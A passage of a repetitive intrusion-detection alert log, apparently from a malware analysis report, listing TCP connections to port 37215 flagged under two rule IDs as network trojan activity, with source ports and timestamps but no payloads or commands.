          SID:2829579
          Source Port:50412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074404
          SID:2835222
          Source Port:37428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.277387
          SID:2835222
          Source Port:37942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079464
          SID:2829579
          Source Port:54604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031377
          SID:2835222
          Source Port:39328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281051
          SID:2829579
          Source Port:50534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225710
          SID:2829579
          Source Port:36872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104503
          SID:2835222
          Source Port:42498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008069
          SID:2829579
          Source Port:39566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.288266
          SID:2835222
          Source Port:60386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921971
          SID:2835222
          Source Port:39070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.723461
          SID:2829579
          Source Port:58564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399017
          SID:2835222
          Source Port:51066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080782
          SID:2829579
          Source Port:58476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915929
          SID:2835222
          Source Port:45024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.894555
          SID:2835222
          Source Port:59772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720365
          SID:2835222
          Source Port:43818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596969
          SID:2835222
          Source Port:48528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660930
          SID:2829579
          Source Port:48046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988965
          SID:2829579
          Source Port:44048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718133
          SID:2835222
          Source Port:42044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651589
          SID:2829579
          Source Port:46864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558253
          SID:2829579
          Source Port:53044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.896005
          SID:2835222
          Source Port:34248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721554
          SID:2829579
          Source Port:42748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077958
          SID:2835222
          Source Port:37884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032010
          SID:2829579
          Source Port:38724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166820
          SID:2829579
          Source Port:34548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012636
          SID:2835222
          Source Port:50806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986440
          SID:2835222
          Source Port:40306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288265
          SID:2835222
          Source Port:59070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947543
          SID:2829579
          Source Port:59568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415711
          SID:2829579
          Source Port:35276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287956
          SID:2829579
          Source Port:55238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596206
          SID:2829579
          Source Port:36264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031994
          SID:2829579
          Source Port:60148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032700
          SID:2829579
          Source Port:55114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990817
          SID:2829579
          Source Port:35212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080569
          SID:2829579
          Source Port:49930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162735
          SID:2829579
          Source Port:54208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.593784
          SID:2835222
          Source Port:46640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905834
          SID:2829579
          Source Port:53638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035107
          SID:2835222
          Source Port:60992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645949
          SID:2829579
          Source Port:42958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399779
          SID:2829579
          Source Port:37472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475981
          SID:2835222
          Source Port:35884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986404
          SID:2835222
          Source Port:43692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412919
          SID:2829579
          Source Port:39684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991305
          SID:2829579
          Source Port:45576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034515
          SID:2835222
          Source Port:58000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713576
          SID:2835222
          Source Port:45114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004433
          SID:2835222
          Source Port:39110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.658421
          SID:2835222
          Source Port:55592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037891
          SID:2835222
          Source Port:58970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869067
          SID:2829579
          Source Port:41002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724315
          SID:2835222
          Source Port:56440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.561909
          SID:2835222
          Source Port:46596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998573
          SID:2835222
          Source Port:51728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164866
          SID:2829579
          Source Port:41212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986515
          SID:2829579
          Source Port:40430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863815
          SID:2835222
          Source Port:48068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120536
          SID:2829579
          Source Port:55338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414164
          SID:2835222
          Source Port:40548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823214
          SID:2829579
          Source Port:49910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283344
          SID:2835222
          Source Port:36854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467133
          SID:2835222
          Source Port:52194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286705
          SID:2835222
          Source Port:51072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163395
          SID:2829579
          Source Port:47836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944333
          SID:2835222
          Source Port:35256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860692
          SID:2835222
          Source Port:42102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.682075
          SID:2829579
          Source Port:46762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.003563
          SID:2835222
          Source Port:59622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599178
          SID:2829579
          Source Port:53668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823196
          SID:2835222
          Source Port:54996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413573
          SID:2829579
          Source Port:46216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034515
          SID:2829579
          Source Port:48534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947992
          SID:2829579
          Source Port:43668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.208303
          SID:2829579
          Source Port:35420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.297627
          SID:2835222
          Source Port:52858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865017
          SID:2835222
          Source Port:58224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164661
          SID:2835222
          Source Port:34308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226624
          SID:2829579
          Source Port:57006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418352
          SID:2835222
          Source Port:50830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718835
          SID:2829579
          Source Port:41226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159629
          SID:2835222
          Source Port:58174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248106
          SID:2835222
          Source Port:37424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719130
          SID:2835222
          Source Port:50302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161053
          SID:2829579
          Source Port:49410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599555
          SID:2835222
          Source Port:38638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412255
          SID:2835222
          Source Port:40634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415156
          SID:2829579
          Source Port:48084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227263
          SID:2829579
          Source Port:41512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416343
          SID:2835222
          Source Port:42508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274656
          SID:2829579
          Source Port:58084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077959
          SID:2835222
          Source Port:42578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716798
          SID:2829579
          Source Port:57746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926013
          SID:2835222
          Source Port:58368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719538
          SID:2829579
          Source Port:57534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414703
          SID:2835222
          Source Port:49240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566279
          SID:2829579
          Source Port:52190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.897799
          SID:2835222
          Source Port:60946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296228
          SID:2829579
          Source Port:45490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399313
          SID:2829579
          Source Port:55392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289071
          SID:2835222
          Source Port:38078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.297774
          SID:2835222
          Source Port:39118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223909
          SID:2829579
          Source Port:56424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.986628
          SID:2835222
          Source Port:39758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820962
          SID:2835222
          Source Port:46668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945792
          SID:2829579
          Source Port:52498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596113
          SID:2835222
          Source Port:41368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397263
          SID:2829579
          Source Port:40040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914354
          SID:2835222
          Source Port:46916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599578
          SID:2835222
          Source Port:42060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.678157
          SID:2835222
          Source Port:55786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205915
          SID:2829579
          Source Port:42278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.134292
          SID:2829579
          Source Port:55530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602582
          SID:2835222
          Source Port:40844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250908
          SID:2835222
          Source Port:37466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165471
          SID:2835222
          Source Port:54274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558890
          SID:2829579
          Source Port:54042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274315
          SID:2835222
          Source Port:47742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004099
          SID:2829579
          Source Port:35712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563344
          SID:2835222
          Source Port:50164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248227
          SID:2835222
          Source Port:57242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945969
          SID:2829579
          Source Port:55374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538288
          SID:2835222
          Source Port:44730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036708
          SID:2829579
          Source Port:51544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206857
          SID:2829579
          Source Port:58822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687576
          SID:2835222
          Source Port:60912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298248
          SID:2835222
          Source Port:41058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944740
          SID:2829579
          Source Port:51746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104839
          SID:2835222
          Source Port:52782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282502
          SID:2835222
          Source Port:33296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164698
          SID:2835222
          Source Port:60538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.661025
          SID:2829579
          Source Port:43416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892903
          SID:2835222
          Source Port:33084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034060
          SID:2829579
          Source Port:51618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038407
          SID:2829579
          Source Port:42548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164181
          SID:2835222
          Source Port:46526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.291271
          SID:2835222
          Source Port:33026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282033
          SID:2829579
          Source Port:38918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571546
          SID:2829579
          Source Port:53056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645837
          SID:2829579
          Source Port:37806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166438
          SID:2835222
          Source Port:51002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595616
          SID:2829579
          Source Port:44334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166791
          SID:2829579
          Source Port:53990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.314773
          SID:2835222
          Source Port:50266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819849
          SID:2835222
          Source Port:58874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076538
          SID:2835222
          Source Port:35322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.280558
          SID:2829579
          Source Port:36508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719434
          SID:2835222
          Source Port:42764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719910
          SID:2835222
          Source Port:34826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568219
          SID:2829579
          Source Port:57284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160975
          SID:2835222
          Source Port:53394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919044
          SID:2829579
          Source Port:48010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563148
          SID:2835222
          Source Port:53046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946298
          SID:2835222
          Source Port:44292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919235
          SID:2835222
          Source Port:49912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288945
          SID:2835222
          Source Port:60204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399613
          SID:2829579
          Source Port:52046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918167
          SID:2829579
          Source Port:45162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250583
          SID:2829579
          Source Port:56458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660735
          SID:2829579
          Source Port:49438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302382
          SID:2835222
          Source Port:58022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.271836
          SID:2835222
          Source Port:57472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477917
          SID:2835222
          Source Port:55492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.137986
          SID:2829579
          Source Port:52748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818952
          SID:2835222
          Source Port:58394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988242
          SID:2829579
          Source Port:44880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468671
          SID:2835222
          Source Port:52360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.642975
          SID:2829579
          Source Port:33706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905494
          SID:2829579
          Source Port:37678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227602
          SID:2829579
          Source Port:49686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226019
          SID:2829579
          Source Port:35110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719812
          SID:2835222
          Source Port:58870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931482
          SID:2829579
          Source Port:37526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677261
          SID:2835222
          Source Port:59914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223402
          SID:2835222
          Source Port:37340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103704
          SID:2829579
          Source Port:35206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.357565
          SID:2835222
          Source Port:40402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920959
          SID:2829579
          Source Port:42236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714998
          SID:2835222
          Source Port:40056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038685
          SID:2829579
          Source Port:40880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651493
          SID:2829579
          Source Port:40288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.079855
          SID:2829579
          Source Port:34014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687359
          SID:2829579
          Source Port:53138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.305168
          SID:2829579
          Source Port:47834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080265
          SID:2829579
          Source Port:50724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399157
          SID:2829579
          Source Port:49394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036801
          SID:2835222
          Source Port:42414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012971
          SID:2829579
          Source Port:36960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719621
          SID:2829579
          Source Port:55128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.653034
          SID:2835222
          Source Port:40030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.693001
          SID:2829579
          Source Port:39624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.076420
          SID:2835222
          Source Port:37554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944855
          SID:2829579
          Source Port:47286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416323
          SID:2829579
          Source Port:36626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539742
          SID:2835222
          Source Port:60116
          Destination Port:37215
